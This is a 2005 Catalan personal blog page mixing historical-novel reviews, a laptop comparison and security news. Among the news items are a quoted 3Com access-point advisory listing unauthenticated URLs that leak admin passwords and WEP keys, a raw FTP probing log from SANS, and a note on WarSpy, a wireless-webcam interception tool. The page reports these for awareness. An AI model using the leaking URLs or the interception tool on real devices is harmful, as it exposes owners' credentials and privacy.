 Roger de Flor, comandant dels Almogàvers, estava al front de les tropes que l'any 1303 va desembarcar a Constantinoble (l'actual Istambul).
La novel·la de Francesc Puigpelat agafa el personatge, d'origen alemany, i el situa a la seva època. Amb converses, cartes i referències de tota mena es relaciona amb els altres personatges claus de l'època com Ramon Muntaner i Ramon Llull. Amb una gran habilitat, tot això fa situar al lector dins de l'esperit de l'època. I això ens permet redescobrir a uns personatges que, d'haver viscut en qualsevol altre nació, serien avui en dia els grans herois històrics i hauríem vist la seva vida en nombroses novel·les històriques i pel·lícules de cinema. Poca gent ha viscut d'una forma tan intensa les seves vides, posant sotes les ordres dels monarques catalans pràcticament tota la Mediterrània.
Roger de Flor va ser assassinat el 4 d'abril de 1305, a Andrianòpolis (d'aquí a poc farà set cents anys). A la novel·la se'l presenta com un personatge molt ambiciós i heroic, però a la vegada inhumà i mesquí. Es presenta als Almogàvers com un temible exèrcit, que no perdia cap oportunitat per saquejar qualsevol població.
«Roger de Flor, el lleó de Constantinoble» és una novel·la històrica, amb moltes llicències per part de l'autor. Ara bé, és una bona oportunitat alguns dels esdeveniments més importants de la nostra història. No cal prendre's el llibre com un reflex d'allò que va succeir... però sí explicat d'una forma no molt diferent de com podria haver succeït.
Títol: Roger de Flor, el lleó de Constantinoble
Autor: Francesc Puigpelat. Premi Pin i Soler 2002, Ciutat de Tarragona
Edicions Proa, col·lecció Butxaca
1a edició juny 2004 (febrer 2003)
374 pàgines
ISBN 84-8437-713-X
|
14:47 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[The Register] E-crime to rocket in 2005. Segons CyberSource, enguany es preveu un augment del 36% del comerç electrònic, amb 20 milions de persones que es gastaran 17.000 milions de lliures esterlines. Per l'any 2009 prediuen que el 25% de tot el comerç es farà utilitzant Internet.
Això també tindrà els seus efectes:
A survey of etailers conducted by Retail Logic, a card processing firm, reveals that 56 per cent of UK respondents believe that online fraud will become more serious for them during 2005 as criminals become more sophisticated. Online retailers are currently refusing six per cent of their orders due to suspicions of fraud.
|
14:11 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Sembla mentida però ja gairebé no recordava que era la pluja... Segons les dades de Infoterrassa, el darrer dia que va ploure (una misèria: 0,2 litres per metre quadrat) va ser el passat dia de Sant Esteve i la última pluja més o menys abundant (22 litres per metre quadrat) va ser l'1 de desembre de 2004. És a dir, que feia ben bé un mes i mig que no queia ni una trista gota.
|
13:30 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Microsoft ha publicat la versió 1.01 de Port Reporter, una eina per a la monitorització de les connexions TCP/IP a una màquina Windows (2000, XP i 2003).
Port Reporter funciona com un servei del sistema i enregistra l'activitat de comunicacions TCP/IP (protocols TCP i UDP) del sistema: data, hora, protocol, port d'origen, adreça IP d'origen, port de destinació, adreça IP de destinació, identificador de procés, mòdul (aplicació) i contexte de seguretat (usuari).
Es tracta, doncs, d'una interessant utilitat que pot ajudar alhora de fer anàlisis de seguretat, identificació de problemes i registre i identificació de les comunicacions TCP i UDP i els ports utilitzats.
La instal·lació és una mica exòtica... Heu de baixar el fitxer que hi ha a la web de Microsoft (seguint l'enllaç indicat més amunt). Es tracta d'un fitxer ZIP autoextraïble que cal descomprimir a un directori temporal. Des d'aquest directori, executeu el pr-setup.exe per a la instal·lació del servei.
Un cop instal·lat, heu d'anar al tauler de control per a iniciar el servei (o fer-ho directament des de la línia d'ordres amb un net start "Port Reporter"). Un cop s'ha iniciat, l'activitat queda enregistrada en un seguit de fitxers al directori %WINDIR%\System32\LogFiles\PortReporter (de totes formes, si mireu al visualitzador d'esdeveniments, registre d'activitat d'aplicacions, a l'entrada de PortReporter s'indica el directori on es troben els fitxers de on s'enregistra l'activitat.
Addicionalment, hi ha PR-Parser, una eina gràfica per a l'anàlisi de la informació generada per Port Reporter.
|
11:44 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
WarSpy és un programa que captura les emissions de webcams sense fils.
WarSpy v0.1 is written in Visual Basic.NET and operates on Microsoft Operating Systems. To use WarSpy, you will need the following equipment:
- Snappy Video Image Capture tool. (Produced by Play, Inc. 1996-2001. No longer produced, but available on online auction sites such as eBay.)
- Snappy software version 3.0. Other versions WILL NOT WORK; it must be 3.0. The software can found on many web sites.
- 2.4GHz Video Receiver
- Laptop computer, running Windows 95 or higher.
|
11:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dissabte, 5 / febrer / 2005 |
Fa unes setmanes comentava que estava començant a rumiar en comprar un nou portàtil. Després de mirar les diverses marques la decisió i els models he decidit continuar amb un Dell. És la única marca que m'ofereix un portàtil avançat, suficient per a no trobar a faltar un ordinador de sobretaula, i a més ofereix un servei d'assistència tècnica a domicili (24 hores), amb assegurança contra-robatori i contra accidents que puguin afectar a la pantalla i el teclat.
Gairebé havia optat per l'Inspiron 8600c quan vaig veure l'anunci d'un nou model, el Precision M70... que gairebé sembla fet a mida dels meus requeriments. Aquí hi ha la comparativa dels dos models:
|
Comparativa de portàtils |
|
Dell Inspiron 8600c |
Dell Precision M70 |
| Processador |
Intel Pentium M 755 (2,0 GHz)
Cache L2 2 MB
Bus 400 MHz FSB
Chipset Intel 855PM 4x AGP |
Intel Pentium M 750 (1,86 GHz)
Cache L2 2 MB
Bus 533 MHz FSB
|
| Memòria |
SDRAM DDR2 bicanal. 2 sòcols. Màxim 2 GB |
SDRAM estàndard DDR2 533 MHz. 2 sòcols. Màxim 2 GB |
| Vídeo |
ATI Radeon 9600 Pro Turbo 128 MB |
nVidia Quadro FxGo 1440 3D OpenGL 256 MB |
| Pantalla |
WUXGA 15,4" (1920x1200) |
WUXGA 15,4" (1920x1200) |
| Disc dur |
60 GB 5400 rpm |
60 GB 5400 rpm |
| Disc compacte |
DVD+R/+RW 8x |
DVD+/- RW 8x |
| Targeta WiFi |
Intel Pro 2002 802.11b/g |
Intel Pro Wireless 2915 802.11a/b/g |
| Bluetooth |
? |
Dell Bluetooth 350 |
| Entrada/Sortida |
IEEE 1394 (Firewire)
2 ports USB 2.0
RJ11 (mòdem V.92)
RJ45 (Ethernet 10/100 Mbps) |
4 ports USB 2.0
RJ11 (mòdem V.92)
RJ45 (Ethernet 10/100/1000 Mbps)
1 port sèrie
PCMCIA (1)
Lector SmartCard |
| Dimensions |
38 x 359 x 274
3,27 Kgr |
42,42 x 361 x 262
3,04 Kgr |
| Garantia |
3 anys in-situ internacional + garantia contra accidents + assegurança antirobatori |
3 anys in-situ internacional + garantia contra accidents + assegurança antirobatori | Ara ja només queda prendre la decisió final.
|
19:29 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Segons informa Microsoft, el proper dimarts 8 de febrer publicarà un total de tretze butlletins de seguretat:
- 9 butlletins de seguretat per a Windows. Hi ha, com a mínim una vulnerabilitat crítica.
- 1 butlletí de seguretat per a Microsoft SharePoint Services and Office, considerada moderada.
- 1 butlletí de seguretat per a .NET, considerada important.
- 1 butlletí de seguretat per a Microsoft Office, considerada com a crítica.
- 1 butlletí de seguretat per a Windows, Media Player i MSN Messenger. També considerada com a crítica.
|
13:09 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
divendres, 4 / febrer / 2005 |
Advanced SQL Injection in Oracle Databases explica, amb diversos exemples, les vulnerabilitats d'injecció SQL en les aplicacions que fan servir el gestor de base de dades Oracle, com és possible aprofitar-se d'aquestes vulnerabilitats i quines mesures es poden prendre per evitar-les. També tracta de les recents vulnerabilitats de desbordament de memòria intermèdia descobertes a Oracle.
|
00:58 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
La llibertat d'expressió és un arma de doble raser. Ho estan descobrint cada vegada més "webloggers", acomiadats pel que expliquen als seus weblogs. L'error més comú és criticar o fer acudits sobre caps i companys, confiant que Internet és tan gran que mai ho llegiran. Delta Air Lines, BlockBuster, la Universitat de Hardvard, Microsoft o Wells Fargo són algunes de les companyies que han acomiadat a empleats per aquest motiu.
Continuació...
|
00:55 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Bruce Schneier és una llegenda viva de la seguretat informàtica. Nord-americà, fundador de l'empresa Counterpane, amb clients de la llista Fortune, barreja el vestit de negocis amb una barba i cua que li donen un toc informal, mostrant al "gurú hacker" que és. Des de fa anys, publica un butlletí mensual gratuït, "Crypto-Gram", amb centenars de milers de subscriptors. Les seves idees sobre seguretat, que ha plasmat en diversos llibres, són respectades en tots els cercles i omple les sales a vessar en les seves freqüents conferències.
Continuació...
|
00:33 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dijous, 3 / febrer / 2005 |
Publicat el 2005 Identity Fraud Survey Report on es reflecteix un considerable augment en els atacs de suplantació de la identitat, que afecten especialment al «món real».
El 72% dels fraus que comporten una suplantació d'identitat tenen lloc al «món real». El volum total dels fraus va pujar fins als 52.600 milions de dòlars l'any passat, només als Estats Units. A Internet, els fraus de suplantació només representen un 12% del total.
Computer crimes accounted for just 11.6 percent of all known-cause identity fraud in 2004; and half of these digitally-driven crimes stem from spyware, software the computer user unknowingly installs to make ads pop-up when the consumer is online. Consumers can protect their financial data by using updated spyware, virus and firewall protection software and not responding to bogus «phishing» emails that request personal data."
|
07:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Silicon.com] Netscape 8 adds anti-phishing features. Està prevista la publicació el proper mes d'una versió de prova del Netscape 8 que inclourà mecanismes per evitar els atacs phishing:
Netscape is in negotiations with various security companies to supply the Netscape 8 beta with frequently updated blacklists of websites that are suspected of purveying spyware, phishing schemes and other hostile code. When someone accesses such a site using Netscape 8, the browser would flash warnings to the user and disable various technologies with security implications, including ActiveX, scripting and cookies.
|
07:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[F-Secure Weblog] Disinfection tool for SymbOS/Locknut.A (Gavno.A and Gavno.B) published. Es tracta d'una utilitat pels usuaris de telèfons mòbil basats en el sistema operatiu Symbian que permet detectar la presència del troià Locknut.A i, cas de trobar-lo, l'esborra.
Locknut.A is a Symbian SIS file trojan, that replaces critical system binary, causing the phone to lock down so that no applications can be used. This locking is quite similar to the one caused by Skulls variants, but more complete.
Locknut.A is also claimed to prevent user from calling with the phone, but we could not observe such behavior. All the phones we infected with Locknut.A were able to call just fine, all smartphone features were disabled, but calling works fine.
|
00:06 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimecres, 2 / febrer / 2005 |
[Vulnwatch] 3Com OfficeConnect Wireless 11g AP Information Disclosure Vulnerability. Amb unes quantes peticions HTTP es possible obtenir l'usuari i la contrasenya d'administració, la clau de xifrat WEP, l'SSID i el registre d'activitat.
An unauthenticated attacker can glean sensitive information from the device via the following URLs:
- /main/config.bin
- /main/profile.wlp?PN=ggg
- /main/event.logs
These URLs will expose the administrative username and password in clear text, the WEP key and SSID, and the router log file respectively.
|
23:32 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
SAFER (Software Restriction Policies) és una tecnologia integrada a Windows XP que permet l'execució de processos fill amb privilegis reduïts, seguint els criteris especificats a la política local de seguretat. Michael Howard explica al seu weblog com configurar l'Internet Explorer per tal de treure profit d'aquesta capacitat.
|
23:22 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
MakeMeAdmin en realitat és un fitxer batch per a Windows, que obre una finestra amb l'intèrpret de línia d'ordres, executat per l'usuari actiu però amb havent realitzat una nova connexió a la xarxa on l'usuari pertany al grup d'administradors. Qualsevol programa executat des d'aquesta finestra ho farà amb privilegis d'administrador.
|
20:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
dimarts, 1 / febrer / 2005 |
[Barrapunto] Microsoft despide a 62 beta testers. Pel que sembla a Redmond han decidit que les màquines són millors per a provar el software... Això vol dir, entre moltes altres coses, que mai més es podrà explicar una història com la de la novel·la «Microsiervos» de Douglas Coupland, protagonitzada per un beta tester de Microsoft.
|
21:33 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
 Björn Kurtén va ser un dels principals estudiosos dels mamífers fòssils del Terciari, especialitzant-se en els carnívors. A més de la seva tasca científica, també va tenir una important obra divulgativa sobre el món dels grans mamífers fòssils.
Una de les publicacions més curioses d'aquest autor és, sens dubte, aquesta novel·la: «La danza del tigre» és un relat sobre com va poder ser el contacte entre dues espècies d'homínids, els Neandertals i els primers Homo sapiens.
I la primera sorpresa és el tractament que dóna als Neandertals. No són pas uns éssers primitius o rudimentaris. Tot el contrari: són sensibles, educats i molt intel·ligents que han de fer front a una situació que cap de nosaltres no ha hagut de fer mai: trobar-se davant per davant amb un altre ésser, diferent però semblant.
«La danza del tigre» és, per tant, una novel·la que presenta una visió per a molts nova d'una Europa on els seus habitants veuen com arriben uns immigrants (nosaltres)... una situació que segurament ens hauria de fer pensar la situació actual del nostre continent.
A destacar, també, el pròleg realitzat per Juan Luis Arsuaga.
Títol: La danza del tigre (Dance of the Tiger. A novel of the Ice Age)
Autor: Björn Kurtén (biografia)
Ediciones Plot
ISBN 84-86702-50-X
|
21:00 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Llista Hack] jcea: el guerrero pacífico. La Mercè Molist entrevista a jcea (Jesús Cea).
M: Eres un hacker muy creativo. No te escondes. Superas las oleadas periódicas de críticas contra tu personaje y sigues vivo. ¿Cómo lo haces?
jcea: Básicamente, tengo una personalidad esquizoide de manual que significa que me da lo mismo la opinión de la gente. Sólo me importa y me afecta la opinión de un pequeño grupo de personas, la gente cercana a mí o la gente que respeto.
|
20:35 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[Microsoft] Mapping International Security Standards to MOF
This white paper maps the requirements of ISO/IEC 17799:2000, an international standard code of practice, to the corresponding processes in the Microsoft Operations Framework (MOF). Its purpose is not to be a prescriptive guide on how to implement MOF and the security requirements, but to provide a checklist of security issues to consider when implementing MOF. Using MOF as the foundation for implementing security controls helps ensure that security is an integral part of each service solution’s life cycle. Organizations preparing for certification of IT security can use this document for guidance on how to prioritize and select appropriate security controls.
|
18:19 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[SANS Internet Storm Center] New FTP Brute Force?
L'atac té aquest aspecte:USER anonymous
331 Guest login ok, type your name as password.
PASS Zgpuser@home.com
230 Guest login ok, access restrictions apply.
CWD /pub/
250 CWD command successful.
MKD 050131161412p
550 050131161412p: Permission denied.
CWD /public/
550 /public/: No such file or directory.
CWD /pub/incoming/
550 /pub/incoming/: No such file or directory.
CWD /incoming/
550 /incoming/: No such file or directory.
CWD /_vti_pvt/
550 /_vti_pvt/: No such file or directory.
CWD /
250 CWD command successful.
MKD 050131161414p
550 050131161414p: Permission denied.
CWD /upload/
550 /upload/: No such file or directory.
CWD /_vti_txt/
550 /_vti_txt/: No such file or directory.
CWD /_vti_cfg/
550 /_vti_cfg/: No such file or directory.
CWD /_vti_log/
550 /_vti_log/: No such file or directory.
CWD /_vti_cnf/
550 /_vti_cnf/: No such file or directory.
CWD /_private/
550 /_private/: No such file or directory.
CWD /public/incoming/
550 /public/incoming/: No such file or directory.
CWD /public_html/
550 /public_html/: No such file or directory.
CWD /wwwroot/
550 /wwwroot/: No such file or directory.
CWD /mailroot/
550 /mailroot/: No such file or directory.
CWD /ftproot/
550 /ftproot/: No such file or directory.
CWD /home/
550 /home/: No such file or directory.
CWD /images/
550 /images/: No such file or directory.
CWD /web/
550 /web/: No such file or directory.
CWD /www/
550 /www/: No such file or directory.
CWD /html/
550 /html/: No such file or directory.
CWD /cgi-bin/
550 /cgi-bin/: No such file or directory.
CWD /usr/
250 CWD command successful.
MKD 050131161417p
550 050131161417p: Permission denied.
CWD /usr/incoming/
550 /usr/incoming/: No such file or directory.
CWD /temp/
550 /temp/: No such file or directory.
CWD /~temp/
550 ~temp: No such file or directory.
CWD /tmp/
550 /tmp/: No such file or directory.
CWD /~tmp/
550 ~tmp: No such file or directory.
CWD /outgoing/
550 /outgoing/: No such file or directory.
CWD /anonymous/
550 /anonymous/: No such file or directory.
CWD /anonymous/_vti_pvt/
550 /anonymous/_vti_pvt/: No such file or directory.
CWD /anonymous/_vti_cnf/
550 /anonymous/_vti_cnf/: No such file or directory.
CWD /anonymous/incoming/
550 /anonymous/incoming/: No such file or directory.
CWD /anonymous/pub/
550 /anonymous/pub/: No such file or directory.
CWD /anonymous/public/
550 /anonymous/public/: No such file or directory.
CWD / /
550 / /: No such file or directory.
CWD / /
550 / /: No such file or directory.
221 You could at least say goodbye.
|
18:08 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
Bad IP addresses/Bob's Block List (LBL). A mi mai m'han agradat les llistes negres per tal de bloquejar de forma indiscriminada determinats rangs d'adreces o dominis d'Internet (tot i que, de forma molt reduïda, les faig servir, especialment per evitar el correu brossa)... La LBL és la més completa relació de rangs d'adreces IP utilitzades per spammers i servidors d'espionatge (com DoubleClick.net) així com dominis habitualment utilitzats per l'enviament de correu brossa.
|
17:59 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
[The Register] Phishing morphs into pharming. Consisteix en el segrest de dominis (o l'emmetzinament del DNS) per tal de redireccionar els usuaris cap a servidors fraudulents.
The trick - dubbed pharming - is potentially more sinister than phishing because it avoids the need to coax users into responding to junk email alerts. The attacks also occur across a broader front, potentially misdirecting all email and web traffic away from victims.
(...)
Both experts agree that pharming is simply a new application of well-known security weaknesses. It highlights security loopholes that can only be partly addressed by better browser security. Improved browser security to prevent address spoofing or crypto plug-in to verify the digital certificates of sites might help. Banking sites could adopt two-factor authentication as a comprehensive defence. More fundamentally, the nascent threat of pharming re-emphasises the need to revamp DNS systems and domain registration that critics argue is long overdue.
|
17:54 (# Enllaç permanent) | Comentaris: | Trackback:
|
|
|
[CNN] 
